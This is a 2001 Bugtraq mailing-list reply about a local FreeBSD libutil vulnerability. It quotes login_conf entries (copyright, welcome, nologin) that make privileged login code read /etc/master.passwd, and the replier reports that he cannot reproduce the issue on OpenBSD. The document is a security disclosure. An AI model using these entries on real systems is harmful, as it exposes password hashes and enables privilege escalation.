Bugtraq mailing list archives

Re: Local vulnerability in libutil derived with FreeBSD 4.4-RC (and earlier)

From: David Terrell <dbt () meat net>
Date: Thu, 20 Sep 2001 14:59:39 -0700

On Thu, Sep 20, 2001 at 09:48:34PM +0200, Przemyslaw Frasunek wrote:
[snip]
in session.c, which allows to read ANY file in system with superuser
privileges, by defining:

default:\
 :copyright=/etc/master.passwd:
or
 :welcome=/etc/master.passwd:
in user's ~/.login_conf.

[snip telnetd/login]
default:\
 :nologin=/etc/master.passwd:

[blah blah FreeBSD core]

Official advisory is pending. It's possible, that other *BSD systems,
supporting login capability database are also vulnerable.

I can't duplicate either of these with OpenBSD 2.9.

--
David Terrell            | "My question is, if a mime types, isn't
dbt () meat net             |  that kinda cheating?"